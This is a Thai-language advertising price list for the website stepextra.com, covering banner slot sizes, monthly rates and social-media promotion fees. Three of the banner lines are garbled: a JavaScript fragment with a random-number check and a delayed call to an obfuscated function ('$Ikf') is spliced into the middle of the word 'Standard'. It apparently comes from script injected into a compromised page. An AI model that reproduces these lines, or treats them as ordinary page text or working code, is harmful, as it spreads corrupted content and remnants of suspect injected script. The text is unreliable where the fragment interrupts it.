ติดต่อลงโฆษณา

A1 (Top Banner : 728 x 90 pixel)จุดเด่น คือ เป็นโฆษณาที่อยู่ด้านบนของทุกหน้าของเว็บไซต์ (2 Slot) – 50,000 บาท/เดือน

A2 (Header Banner : 728 x 90 pixel)จุดเด่น คือ โฆษณาที่อยู่เหนือบทความทุกหน้า (3 Slot) – 30,000 บาท/เดือน

A3 (Footer Banner :728 x 90 pixel)แสดงผลทุกหน้าของเว็บไซต์ (3 Slot ) – 25,000 บาท/เดือน

B1 (Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andard Banner : 300 x 350 pixel)จุดเด่น คือ เป็นโฆษณาที่อยู่ในส่วนของด้านขวาแสดงผลทุกหน้า (3 Slot ) – 20,000 บาท/เดือน

B2 (Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andard Banner : 300 x 350 pixel)จุดเด่น คือ เป็นโฆษณาที่อยู่ในส่วนของด้านขวาแสดงผลทุกหน้า (3 Slot ) – 20,000 บาท/เดือน

B3 (Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andard Banner : 300 x 350 pixel)จุดเด่น คือเป็นโฆษณาที่อยู่ในส่วนของด้านขวาแสดงผลทุกหน้า (3 Slot ) – 20,000 บาท/เดือน

Custom size 30,000 – 100,000 บาท

Advertorial / Product Review – 40,000 บาท
News Event Reporter/ Content article – 20,000 บาท
Broadcast onFacebook fanpage– 1,000 บาท / ครั้ง
Sticky on Facebook fanpage – 10,000 บาท / สัปดาห์
Facebook Boost post – Budget boost post + operation 10%
Contact info @ stepextra.com